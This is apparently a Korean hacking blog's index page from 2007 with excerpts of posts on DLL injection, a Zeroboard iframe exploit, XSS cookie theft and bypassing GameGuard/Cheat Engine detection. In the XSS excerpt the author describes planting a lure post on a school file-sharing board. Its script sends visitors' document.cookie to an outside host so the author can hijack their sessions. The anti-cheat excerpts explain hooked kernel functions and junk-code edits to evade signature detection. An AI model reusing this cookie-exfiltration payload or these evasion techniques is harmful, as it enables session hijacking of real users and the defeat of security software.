본문 바로가기

전체 글847

Packet Make & Edit 2007. 3. 8.
Dll Injection 2007. 3. 8.
제로보드 pl7 ======================================================================================= 0x00. 배경 설명 0x01. GET, POST method request와 iframe tag 0x02. 실제 적용되는 공격 0x03. End ======================================================================================= 0x00. 배경 설명 따로 'GET, POST method iframe exploit' 이라는 이름을 붙인 이유는 기존 공격들과 구분을 할 필요성을 느꼈기 때문이다. 현재까지 웹컨텐츠 해킹기법은 많은 발전을 해왔다. 단순한 Cookie spoofing.. 2007. 3. 8.
XSS - 메일로 전송하기 흔히 XSS 공격을 할때 가장 중요한건 상대방의 session_id가 소멸 되기 전에 자신의 session_id를 상대방 걸로 바꿔 치는건데, 계속 메일창만 드려다 볼수는 없는 노릇임으로, 적절한 작전이 필요한데, 최상의 방법은 바로 MSN 메일을 쓰는 것이다. MSN 메신져를 켜둔 상태에서 MSN 메일에 새로운 메일이 도착하면 알려주는 서비스를 이용해 우리는 신속하게 session_id를 사용할 수 있게 된다. 실제로 학교 웹하드 게시판에 이렇게 글을 적어 두었다. 제목 : 우와 진짜 끝내 주네요! 내용 : 이젠 웹링크도 지원되고 정말 좋은거 같습니다!! i.location="http://rvc.muz.ro/1.php?c="+document.cookie 스크립트가 들어갔지만 실제로 화면으론 다음과 같이.. 2007. 3. 8.
Bypass REV 939 We all know that gg overwrites the first 5 bytes of KeAttachProcess, KeStackAttachProcess and KiAttachProcess. Now, they've extended this method for the following functions too: NtOpenProcess NtReadVirtualMemory NtWriteVirtualMemory NtProtectVirtualMemory NtDeviceIoControlFile The first 5 bytes of these functions are all altered. And they stopped hooking the SSDT for these functions. (The only S.. 2007. 3. 8.
Bypass REV 878 FOR UNDETECTING IN REV 878: Code that is detected for rev 833 in mainunit.pas: if err>0 then begin if res=-1 then begin end; ok:=res=mryes; if (res=mryes) or (res=mrno) then res:=-1; //reset end else ok:=true; end else ok:=true; (it may be a bit different in CE 5.2) Add more variables and junk code. My code that is undetected is this(5.2): (this color means i added or changed it) if err>IQ then .. 2007. 3. 8.